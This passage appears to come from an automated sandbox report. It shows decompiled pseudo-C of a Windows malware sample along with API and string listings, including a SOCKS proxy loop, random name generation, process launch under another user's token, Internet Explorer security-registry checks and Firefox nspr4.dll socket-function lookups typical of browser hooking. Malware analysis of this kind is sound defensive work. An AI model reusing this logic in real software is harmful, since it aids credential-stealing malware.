                				if(lstrcmpiA( *_t77, "socks") != 0) {
                					_t45 = E00409DCE( *_t77, _t78, 0);
                					_t5 = _t45 - 1; // -1
                					_t78 = _t5;
                					__eflags = _t5 - 0xfffd;
                					if(_t5 > 0xfffd) {
                						goto L18;
                					}
                					_t55 = _t45 & 0x0000ffff;
                					_v12 = _t55;
                					__eflags = _t55;
                					if(_t55 == 0) {
                						goto L18;
                					}
                					goto L4;
                				} else {
                					_v12 = _v12 | 0xffffffff;
                					L4:
                					_t58 = E0040C8A8(E00409DCE(_t77[2], _t78, 0), _t78, _t77[1]);
                					_v8 = _t58;
                					if(_t58 == 0xffffffff) {
                						L18:
                						WaitForMultipleObjects(_v292 & 0x000000ff,  &_v288, 1, 0xffffffff);
                						E0040ED5F( &_v292);
                						E004097F7( *_t77);
                						E004097F7(_t77[1]);
                						E004097F7(_t77[2]);
                						E0040DD1D(_t77[3]);
                						E004097F7(_t77);
                						return 0;
                					}
                					E0040CC2C(_t78, _t58);
                					E0040CBEA(_v8);
                					_t62 = E00407B82(_t78,  &_v780);
                					_t79 =  &_v776;
                					_t64 = E0040A655(_t62 | 0xffffffff,  &_v776,  &_v32);
                					_t94 = _t64;
                					if(_t64 == 0) {
                						L17:
                						E0040CBD4(_t64, _v8);
                						goto L18;
                					}
                					_a7 = E00410211( &_v776, _v24, _t94, _v8, 1, _v32);
                					_t64 = E0040A645( &_v32);
                					if(_a7 == 0) {
                						goto L17;
                					}
                					while(E0040CB16(0,  &_v8, 0) == _v8) {
                						_t64 = E0041011C( &_v20, _t79, _v8,  &_a4);
                						__eflags = _t64;
                						if(_t64 == 0) {
                							goto L17;
                						}
                						__eflags = _v16 - 2;
                						if(_v16 == 2) {
                							__eflags = _v18 - 4;
                							if(_v18 == 4) {
                								_t84 = HeapAlloc( *0x41a570, 8, 0x10);
                								__eflags = _t84;
                								if(_t84 != 0) {
                									_t84[1] = _v12;
                									 *_t84 = _t77;
                									_t84[2] =  *_a4;
                									_t75 = E0040ED1A( &_v292, 0x20000, E00408FDE, _t84);
                									__eflags = _t75;
                									if(_t75 == 0) {
                										E004097F7(_t84);
                									}
                								}
                								E0040ECC8(_t79,  &_v292);
                							}
                						}
                						E004097F7(_a4);
                					}
                					goto L17;
                				}
                			}

                APIs
                • lstrcmpiA.KERNEL32(?,socks,?,00000000,00000104), ref: 004090D5
                • HeapAlloc.KERNEL32(00000008,00000010,?,?,00000000,?,00000001,?,?,?,00000000,?), ref: 004091AD
                  • Part of subcall function 0040ED1A: SetLastError.KERNEL32(0000009B,00415911,00000000,004157C7,00000000,004191C8,00000000,00407E47,004191C8,00000000,00000104,74B5F560,00000000,004080C4,00000001), ref: 0040ED24
                  • Part of subcall function 004097F7: HeapFree.KERNEL32(00000000,00000000,0040F4F2,00000000,?,?,?,?,00407564,00000000,00407832), ref: 0040980A
                • WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 0040922C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: Heap$AllocErrorFreeLastMultipleObjectsWaitlstrcmpi
                • String ID: socks
                • API String ID: 3361116139-511798724
                • Opcode ID: d4d7042a85951943f72a512cb4ad488bfbe457d257a8d59fa37b78e7bff6fd32
                • Instruction ID: bc8e2b8e7286b2f4876667b51f5f8ce0adaa9835a66361a97bb73d61f2135741
                • Opcode Fuzzy Hash: d4d7042a85951943f72a512cb4ad488bfbe457d257a8d59fa37b78e7bff6fd32
                • Instruction Fuzzy Hash: C841C131900209AADF11AFA1CC86ADDBB75AF04318F1045BBF554BB1E3CB789E519B58
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0040E6D9(signed int __eax, signed int __ecx, void* __eflags, signed int _a4, signed short* _a8) {
                				signed int _v8;
                				signed int _v12;
                				signed int _v16;
                				signed int _v20;
                				intOrPtr _v24;
                				char* _v28;
                				char* _v32;
                				signed int _t56;
                				WCHAR* _t57;
                				short* _t59;
                				signed short _t72;
                				char* _t78;
                				signed int _t85;
                				signed short* _t86;
                				signed int _t88;
                				intOrPtr _t89;
                				void* _t90;
                
                				_t88 = E0040B82B(__eax & 0x000000ff, __ecx & 0x000000ff);
                				_v16 = _t88;
                				_t56 = E0040B7DF();
                				_t78 = "bcdfghklmnpqrstvwxz";
                				if((_t56 & 0x00000100) == 0) {
                					_v32 = "aeiouy";
                					_v28 = _t78;
                				} else {
                					_v32 = _t78;
                					_v28 = "aeiouy";
                				}
                				_t85 = 0;
                				_v12 = 0;
                				_v8 = 0;
                				if(_t88 > 0) {
                					_v20 = _a4 & 0x00000004;
                					do {
                						if(_v8 == 2) {
                							if((E0040B7DF() & 0x00000100) == 0) {
                								_v32 = "aeiouy";
                								_v28 = _t78;
                							} else {
                								_v32 = _t78;
                								_v28 = "aeiouy";
                							}
                							_v8 = _v8 & 0x00000000;
                						}
                						_t89 =  *((intOrPtr*)(_t90 + _v8 * 4 - 0x1c));
                						_v24 = ((0 | _t89 != _t78) - 0x00000001 & 0x0000000d) + 6;
                						if(_v20 == 0 || _t85 - _v12 <= 1 || (E0040B7DF() & 0x00000101) != 0x101) {
                							_t72 =  *((char*)(E0040B82B(_v24 - 1, 0) + _t89));
                						} else {
                							_t72 = 0x20;
                							_v12 = _t85;
                						}
                						_a8[_t85] = _t72;
                						_t85 = _t85 + 1;
                						_v8 = _v8 + 1;
                					} while (_t85 < _v16);
                					_t88 = _v16;
                				}
                				if((_a4 & 0x00000004) == 0 || _t88 <= 0) {
                					_t86 = _a8;
                				} else {
                					_t86 = _a8;
                					_t59 = _t86 + _t88 * 2 - 2;
                					while( *_t59 == 0x20) {
                						_t88 = _t88 - 1;
                						_t59 = _t59;
                						if(_t88 > 0) {
                							continue;
                						} else {
                						}
                						goto L24;
                					}
                				}
                				L24:
                				_t57 = 0;
                				_t86[_t88] = 0;
                				if((_a4 & 0x00000002) != 0) {
                					_t57 = CharUpperW( *_t86 & 0x0000ffff);
                					 *_t86 = 0;
                				}
                				return _t57;
                			}

                APIs
                  • Part of subcall function 0040B7DF: GetTickCount.KERNEL32 ref: 0040B7DF
                • CharUpperW.USER32(00000000,?,.exe,00000000,00000000), ref: 0040E7FB
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: CharCountTickUpper
                • String ID: .exe$aeiouy$bcdfghklmnpqrstvwxz
                • API String ID: 2674899715-3410450461
                • Opcode ID: 5ce55507fe68b4b54e6ea502bc40a64b3056262b90de894a08c2d1dfb0d961ba
                • Instruction ID: bd46e66f34b512ffce1da6f1e8eb4773afd7cecde61ff36cc39a8f663300086b
                • Opcode Fuzzy Hash: 5ce55507fe68b4b54e6ea502bc40a64b3056262b90de894a08c2d1dfb0d961ba
                • Instruction Fuzzy Hash: AA418F75D006199BDB11AF96C0852AEBBB4EF44304F64887BD811BB3C0D3BC9A518BD9
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 63%
                			E0040E9AF(void* __ecx, intOrPtr _a4, intOrPtr _a12, signed char _a16) {
                				char _v268;
                				char _v280;
                				char _v284;
                				signed int _v290;
                				signed int _v292;
                				signed int _v296;
                				unsigned int _t24;
                				void* _t26;
                				signed int _t28;
                				char* _t29;
                				void* _t30;
                				void* _t41;
                				char* _t42;
                				void* _t46;
                				signed int _t50;
                				void* _t51;
                				signed int _t52;
                				void* _t54;
                
                				_t54 = (_t52 & 0xfffffff8) - 0x118;
                				_t46 = __ecx;
                				_t24 = E00409833( &_v284, _a4, 0x10);
                				_v296 = _v296 ^ _t24;
                				_v292 = _v292 ^ _t24;
                				_v290 = _v290 ^ _t24 >> 0x00000010;
                				_t41 = 0;
                				_t26 = 0;
                				do {
                					 *(_t54 + _t41 + 0x10) =  *(_t54 + _t41 + 0x10) ^  *(_t51 + _t26 + 0xc);
                					_t26 = _t26 + 1;
                					if(_t26 == 4) {
                						_t26 = 0;
                					}
                					_t41 = _t41 + 1;
                				} while (_t41 < 8);
                				if(_a12 != 0) {
                					E00409833( &_v268, _a12, 0x102);
                					E0040B928( &_v280, _t41,  &_v296, 0x10);
                				}
                				_t28 = _a16 & 0x000000ff;
                				if(_t28 != 0) {
                					_t30 = _t28 - 1;
                					if(_t30 == 0) {
                						_t42 = L"Local\\";
                						_push(6);
                						goto L11;
                					} else {
                						if(_t30 == 1) {
                							_t42 = L"Global\\";
                							_push(7);
                							L11:
                							_pop(_t50);
                							E00409AD3(_t50, _t42, _t46);
                							_t46 = _t46 + _t50 * 2;
                						}
                					}
                				}
                				_t29 =  &_v284;
                				__imp__StringFromGUID2(_t29, _t46, 0x28);
                				return _t29;
                			}

                APIs
                • StringFromGUID2.OLE32(?,{F0CFCAE1-4272-0517-A2A0-B1E71D94040E},00000028,?,?,00000010,?,00000000), ref: 0040EA55
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: FromString
                • String ID: Global\$Local\${F0CFCAE1-4272-0517-A2A0-B1E71D94040E}
                • API String ID: 1694596556-4182782267
                • Opcode ID: 6256d47daddc5c480a1ef1b391e778981e6d3c7f452aeb817d7fd05c1ea2e60f
                • Instruction ID: 82d45922a16d811bea1abb10ec77fc0c1f953c1e40f1290b2110952d4e561a1b
                • Opcode Fuzzy Hash: 6256d47daddc5c480a1ef1b391e778981e6d3c7f452aeb817d7fd05c1ea2e60f
                • Instruction Fuzzy Hash: A4110332214349A7C714EA79C845AAF3799FB89714F048D3FF191E21C2DBB8C514CB9A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 86%
                			E0040B277(WCHAR* _a4) {
                				short _v524;
                				char _v1044;
                				void* __edi;
                				void* _t11;
                				void* _t19;
                				void* _t20;
                
                				if(GetTempPathW(0xf6,  &_v524) - 1 > 0xf5) {
                					L6:
                					return 0;
                				}
                				_t19 = 0;
                				while(1) {
                					_push(E0040B7DF());
                					_push(L"tmp");
                					_t18 =  &_v1044;
                					_t11 = E0040A4B7(_t10, 0x104,  &_v1044, L"%s%08x");
                					_t20 = _t20 + 0xc;
                					if(_t11 == 0xffffffff) {
                						goto L6;
                					}
                					if(E0040B635(_t18, _a4,  &_v524) == 0 || CreateDirectoryW(_a4, 0) == 0) {
                						_t19 = _t19 + 1;
                						if(_t19 < 0x64) {
                							continue;
                						}
                						goto L6;
                					} else {
                						return 1;
                					}
                				}
                				goto L6;
                			}

                APIs
                • GetTempPathW.KERNEL32(000000F6,?), ref: 0040B28E
                  • Part of subcall function 0040B7DF: GetTickCount.KERNEL32 ref: 0040B7DF
                  • Part of subcall function 0040B635: PathCombineW.SHLWAPI(?,?,00401EC0,004076D9,?,?,?,00000000), ref: 0040B64C
                • CreateDirectoryW.KERNEL32(?,00000000,?,?), ref: 0040B2E0
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: Path$CombineCountCreateDirectoryTempTick
                • String ID: %s%08x$tmp
                • API String ID: 1218007593-1196434543
                • Opcode ID: 74bf11d556c9ee13242fbc0baf65b219239f41313795410a8415de2f4bf4a6c5
                • Instruction ID: 72d0e886c8ba06fe8f0a55e654c4bfc4a8d7cc122ebb8ef9b9b53ccb4d862680
                • Opcode Fuzzy Hash: 74bf11d556c9ee13242fbc0baf65b219239f41313795410a8415de2f4bf4a6c5
                • Instruction Fuzzy Hash: 1FF0F47110022866DA206A159C0EBEF7728DB55714F1002BBFE51F61E1D3B98E8A96DD
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0040B3BA(WCHAR* _a4) {
                				signed short _t4;
                				short _t9;
                				signed int _t10;
                				WCHAR* _t11;
                				WCHAR* _t13;
                				int _t18;
                
                				_t13 = _a4;
                				_t9 = 0;
                				_t11 = PathSkipRootW(_t13);
                				if(_t11 == 0) {
                					_t11 = _t13;
                				}
                				while(1) {
                					_t4 =  *_t11 & 0x0000ffff;
                					if(_t4 == 0x5c || _t4 == 0) {
                						goto L4;
                					}
                					L10:
                					_t11 =  &(_t11[1]);
                					continue;
                					L4:
                					_t10 = _t4 & 0x0000ffff;
                					 *_t11 = 0;
                					if(GetFileAttributesW(_t13) == 0xffffffff) {
                						_t18 = CreateDirectoryW(_t13, 0);
                					}
                					if(_t18 == 0) {
                						L12:
                						return _t9;
                					} else {
                						if(_t10 == 0) {
                							_t9 = 1;
                							goto L12;
                						}
                						 *_t11 = _t10;
                						goto L10;
                					}
                				}
                			}

                APIs
                • PathSkipRootW.SHLWAPI(?,.exe,00000000,?,00000000,00408D96,?,?,?,?,?,00000000,?,00000017,?,00000000), ref: 0040B3C5
                • GetFileAttributesW.KERNEL32(?,?,00000000,00408D96,?,?,?,?,?,00000000,?,00000017,?,00000000,00000000,00000002), ref: 0040B3EA
                • CreateDirectoryW.KERNEL32(?,00000000,?,00000000,00408D96,?,?,?,?,?,00000000,?,00000017,?,00000000,00000000), ref: 0040B3F8
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: AttributesCreateDirectoryFilePathRootSkip
                • String ID: .exe
                • API String ID: 4231520044-4119554291
                • Opcode ID: daafcb03a78f2d462975e9f7e0ffc57a41fd2a0d6117033301992045b653839f
                • Instruction ID: dddf70c896419581ea9ddd8e39d5de948c025f020d909f9b8078180060adba13
                • Opcode Fuzzy Hash: daafcb03a78f2d462975e9f7e0ffc57a41fd2a0d6117033301992045b653839f
                • Instruction Fuzzy Hash: 8AF0F6355542255AC3300A255C05BB7B798DE417A0BA14537EED1F73E2D7789C0292EC
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 84%
                			E004084A9(void* __ecx, void* __esi, void* _a4, void* _a8, void* _a12, intOrPtr _a16) {
                				void* _t13;
                				void** _t24;
                				void* _t27;
                
                				_t13 = _a4(_a8,  &_a8);
                				if(_t13 != 0) {
                					_t24 = E0040DC40(__ecx, _a8);
                					if(_t24 != 0) {
                						if(EqualSid( *_t24, _a12) != 0) {
                							_t27 = _a8;
                							if(E0040A532( &_a4,  &M0040284C, _a16) > 0) {
                								E0040F61D(_t27, _a4);
                								E004097F7(_a4);
                							}
                						}
                						E004097F7(_t24);
                					}
                					return CloseHandle(_a8);
                				}
                				return _t13;
                			}

                APIs
                  • Part of subcall function 0040DC40: GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000,?,00000000,?,?,0040F333,?,?,?,0040784E,000000FF,004192E0), ref: 0040DC59
                  • Part of subcall function 0040DC40: GetLastError.KERNEL32(?,00000000,?,?,0040F333,?,?,?,0040784E,000000FF,004192E0,00000000,?,00000000), ref: 0040DC5F
                  • Part of subcall function 0040DC40: GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000,?,00000000,?,?,0040F333,?,?,?,0040784E,000000FF,004192E0), ref: 0040DC89
                • EqualSid.ADVAPI32(00000000,004085F2,?,004085F2), ref: 004084CE
                  • Part of subcall function 0040F61D: LoadLibraryA.KERNEL32(userenv.dll,?), ref: 0040F62E
                  • Part of subcall function 0040F61D: GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 0040F64D
                  • Part of subcall function 0040F61D: GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 0040F659
                  • Part of subcall function 0040F61D: CreateProcessAsUserW.ADVAPI32(?,00000000,004084FD,00000000,00000000,00000000,004084FD,004084FD,00000000,?,?,?,00000000,00000044), ref: 0040F6CA
                  • Part of subcall function 0040F61D: CloseHandle.KERNEL32(?), ref: 0040F6DD
                  • Part of subcall function 0040F61D: CloseHandle.KERNEL32(?), ref: 0040F6E2
                  • Part of subcall function 0040F61D: FreeLibrary.KERNEL32(?), ref: 0040F6F9
                  • Part of subcall function 004097F7: HeapFree.KERNEL32(00000000,00000000,0040F4F2,00000000,?,?,?,?,00407564,00000000,00407832), ref: 0040980A
                • CloseHandle.KERNEL32(?,?,004085F2), ref: 0040850F
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: CloseHandle$AddressFreeInformationLibraryProcToken$CreateEqualErrorHeapLastLoadProcessUser
                • String ID: "%s"$C:\Users\Jamey\AppData\Roaming
                • API String ID: 4035272744-1023187160
                • Opcode ID: 8a98f99d10ef029f03494724b153bc7f4ff41dc3bcb87da57e9fec4c509c0e40
                • Instruction ID: 89bcfa0803f21314e5956511db12d20a0d81ac0a6a5eac65522ca9d159d333f9
                • Opcode Fuzzy Hash: 8a98f99d10ef029f03494724b153bc7f4ff41dc3bcb87da57e9fec4c509c0e40
                • Instruction Fuzzy Hash: FDF01236100109BBCF116F51ED45DDF3F69AF94354B04803AFD18B51A2DB39CA20EB58
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 86%
                			E0040EF91(void* __ecx, short* _a4, short* _a8) {
                				void* _v8;
                				signed int _t10;
                				int* _t15;
                
                				_t15 = 0;
                				_v8 = 0x80000001;
                				if(_a4 == 0 || RegOpenKeyExW(0x80000001, _a4, 0, 1,  &_v8) == 0) {
                					_t10 = RegQueryValueExW(_v8, _a8, 0, 0, 0, 0);
                					asm("sbb bl, bl");
                					_t15 =  ~_t10 + 1;
                					if(_a4 != 0) {
                						RegCloseKey(_v8);
                					}
                				}
                				return _t15;
                			}

                APIs
                • RegOpenKeyExW.ADVAPI32(80000001,77E49EB0,00000000,00000001,00000000,Software\Microsoft\Internet Explorer\Privacy,00000000,?,?,00412E9B,Software\Microsoft\Internet Explorer\Privacy,CleanCookies,80000001,Software\Microsoft\Internet Explorer\PhishingFilter,00000000), ref: 0040EFB3
                • RegQueryValueExW.ADVAPI32(00000000,?,00000000,00000000,00000000,00000000,Software\Microsoft\Internet Explorer\Privacy,00000000,?,?,00412E9B,Software\Microsoft\Internet Explorer\Privacy,CleanCookies,80000001,Software\Microsoft\Internet Explorer\PhishingFilter,00000000), ref: 0040EFC7
                • RegCloseKey.ADVAPI32(00000000,?,?,00412E9B,Software\Microsoft\Internet Explorer\Privacy,CleanCookies,80000001,Software\Microsoft\Internet Explorer\PhishingFilter,00000000,?,77E49EB0,00000000), ref: 0040EFDD
                Strings
                • Software\Microsoft\Internet Explorer\Privacy, xrefs: 0040EF96
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: CloseOpenQueryValue
                • String ID: Software\Microsoft\Internet Explorer\Privacy
                • API String ID: 3677997916-2534944989
                • Opcode ID: d188b7e48bf08c8685dc8ea4fde570a0b0ab0f789e056fc68ff25ef5254fecc1
                • Instruction ID: d1280478838fcd4d0becdad72d887cefeb24434b522edcd6d61dd8f6db6918ac
                • Opcode Fuzzy Hash: d188b7e48bf08c8685dc8ea4fde570a0b0ab0f789e056fc68ff25ef5254fecc1
                • Instruction Fuzzy Hash: ADF09031542128FBCB209FA2DD4DDCF7F6CEF06790B108526F449A2160D2759A94DBA4
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0040EE27(void* _a4, short* _a8, short* _a12, int* _a16, char* _a20, int _a24) {
                				signed int _t19;
                				signed int _t20;
                
                				_t20 = _t19 | 0xffffffff;
                				if(_a8 == 0 || RegOpenKeyExW(_a4, _a8, 0, 1,  &_a4) == 0) {
                					if(RegQueryValueExW(_a4, _a12, 0, _a16, _a20,  &_a24) == 0) {
                						_t20 = _a24;
                					}
                					if(_a8 != 0) {
                						RegCloseKey(_a4);
                					}
                				}
                				return _t20;
                			}

                APIs
                • RegOpenKeyExW.ADVAPI32(77E49EB0,00000000,00000000,00000001,77E49EB0,Software\Microsoft\Internet Explorer\PhishingFilter,?,0040EDF3,77E49EB0,?,00000000,00000000,00000000,00000004,?,?), ref: 0040EE42
                • RegQueryValueExW.ADVAPI32(77E49EB0,00000000,00000000,?,80000001,00412E77,Software\Microsoft\Internet Explorer\PhishingFilter,?,0040EDF3,77E49EB0,?,00000000,00000000,00000000,00000004), ref: 0040EE5E
                • RegCloseKey.ADVAPI32(77E49EB0,?,0040EDF3,77E49EB0,?,00000000,00000000,00000000,00000004,?,?,00412E77,80000001,Software\Microsoft\Internet Explorer\PhishingFilter,00000000), ref: 0040EE74
                Strings
                • Software\Microsoft\Internet Explorer\PhishingFilter, xrefs: 0040EE2A
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: CloseOpenQueryValue
                • String ID: Software\Microsoft\Internet Explorer\PhishingFilter
                • API String ID: 3677997916-1156891443
                • Opcode ID: e22c9f8a18a6840d6111768aa4ed264c88314107c800eca66fb5c4fef9130150
                • Instruction ID: 81f5fa9c1e8121a9097eec73d893d2af5cf02b832e253095055a4dc12f849a39
                • Opcode Fuzzy Hash: e22c9f8a18a6840d6111768aa4ed264c88314107c800eca66fb5c4fef9130150
                • Instruction Fuzzy Hash: D5F0E73210020DBBDF219F95DC04BDA3B69AB147A1F008032FE59A51E0D379D9A5DBC4
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 68%
                			E004075D7(void* __eax, signed char _a4) {
                				short _v524;
                				signed int _t11;
                				WCHAR* _t16;
                
                				if((_a4 & 0x00000001) != 0) {
                					L4:
                					GetModuleFileNameW(0,  &_v524, 0x104);
                					_t11 = E00409AEE( &_v524);
                					 *0x41932c = _t11;
                					return _t11 & 0xffffff00 | _t11 != 0x00000000;
                				}
                				_t16 = L"C:\\Users\\Jamey\\AppData\\Roaming";
                				__imp__SHGetFolderPathW(0, 0x1a, 0, 0, _t16);
                				if(__eax == 0) {
                					PathRemoveBackslashW(_t16);
                					goto L4;
                				}
                				return 0;
                			}

                APIs
                • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,C:\Users\Jamey\AppData\Roaming,00000000), ref: 004075F5
                • PathRemoveBackslashW.SHLWAPI(C:\Users\Jamey\AppData\Roaming), ref: 00407604
                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000), ref: 00407618
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: Path$BackslashFileFolderModuleNameRemove
                • String ID: C:\Users\Jamey\AppData\Roaming
                • API String ID: 41170746-382707871
                • Opcode ID: 004e3ea2b7706ce64338be5f3b712c28e76af9f936456c3193e7e210aaf6ddcd
                • Instruction ID: 5c2d7b900f6a9a4de181bdf5537ccc6e010dd08d775d701af251132af00cac4f
                • Opcode Fuzzy Hash: 004e3ea2b7706ce64338be5f3b712c28e76af9f936456c3193e7e210aaf6ddcd
                • Instruction Fuzzy Hash: DCF0273064835877EB206B708E0AFDB3B9C4B15751F0080B5FA46F50E1DAB89940CAAD
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 92%
                			E00407728(void* __edi, void* __eflags) {
                				void* _t4;
                				void* _t7;
                				void* _t8;
                
                				InitializeCriticalSection(0x41aa20);
                				 *0x41aa14 =  *0x41aa14 & 0x00000000;
                				 *0x41aa10 =  *0x41aa10 & 0;
                				 *0x41aa1c = 0;
                				 *0x41aa18 = 0;
                				E00412E18(_t7);
                				 *0x4191a4 =  *0x4191a4 & 0x00000000;
                				 *0x4191c0 =  *0x4191c0 & 0x00000000;
                				InitializeCriticalSection(0x4191a8);
                				if(GetModuleHandleW(L"nspr4.dll") == 0) {
                					_t4 = 0;
                				} else {
                					_push(__edi);
                					_t4 = E00404DB1(_t7, _t8, _t3);
                				}
                				if(_t4 != 0) {
                					 *0x4191a0 =  *0x4191a0 | 0x00000001;
                				}
                				E00404CCE();
                				return 1;
                			}

                APIs
                • InitializeCriticalSection.KERNEL32(0041AA20,00000000,00407927,00000000,?,00000000), ref: 00407734
                  • Part of subcall function 00412E18: InitializeCriticalSection.KERNEL32(0041AA38), ref: 00412E36
                • InitializeCriticalSection.KERNEL32(004191A8,?,00000000), ref: 00407769
                • GetModuleHandleW.KERNEL32(nspr4.dll,?,00000000), ref: 00407770
                  • Part of subcall function 00404DB1: GetProcAddress.KERNEL32(00000000,PR_OpenTCPSocket), ref: 00404DBF
                  • Part of subcall function 00404DB1: GetProcAddress.KERNEL32(00000000,PR_Close), ref: 00404DCC
                  • Part of subcall function 00404DB1: GetProcAddress.KERNEL32(00000000,PR_Read), ref: 00404DD9
                  • Part of subcall function 00404DB1: GetProcAddress.KERNEL32(00000000,PR_Write), ref: 00404DE6
                  • Part of subcall function 00404DB1: ResetEvent.KERNEL32(?,00000000,00407783,?,00000000), ref: 00404DF3
                  • Part of subcall function 00404DB1: SetEvent.KERNEL32(00419140,00000000,?,00000000,00407783,?,00000000), ref: 00404E33
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: AddressProc$CriticalInitializeSection$Event$HandleModuleReset
                • String ID: nspr4.dll
                • API String ID: 1132501977-741017701
                • Opcode ID: 391247c27e63a50717901a38e7f55fb24438555771ffd6d281860828161e356a
                • Instruction ID: 3e6abfb8016c021bc7d3bcaba77ac5b46de26a3cc09bd4c88bd6b66b3cedb502
                • Opcode Fuzzy Hash: 391247c27e63a50717901a38e7f55fb24438555771ffd6d281860828161e356a
                • Instruction Fuzzy Hash: 57F0B435952211BAE7009BA5BE0D7D537D0AF453E5F50813BD400B31A2D77C5851CB9F
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0040F502(void* __ecx) {
                				signed int _v8;
                				struct HINSTANCE__* _t7;
                
                				_v8 = _v8 & 0x00000000;
                				_t7 = GetModuleHandleW(L"kernel32.dll");
                				if(_t7 == 0) {
                					L4:
                					return _t7 & 0xffffff00 | _v8 != 0x00000000;
                				} else {
                					_t7 = GetProcAddress(_t7, "IsWow64Process");
                					if(_t7 == 0) {
                						goto L4;
                					} else {
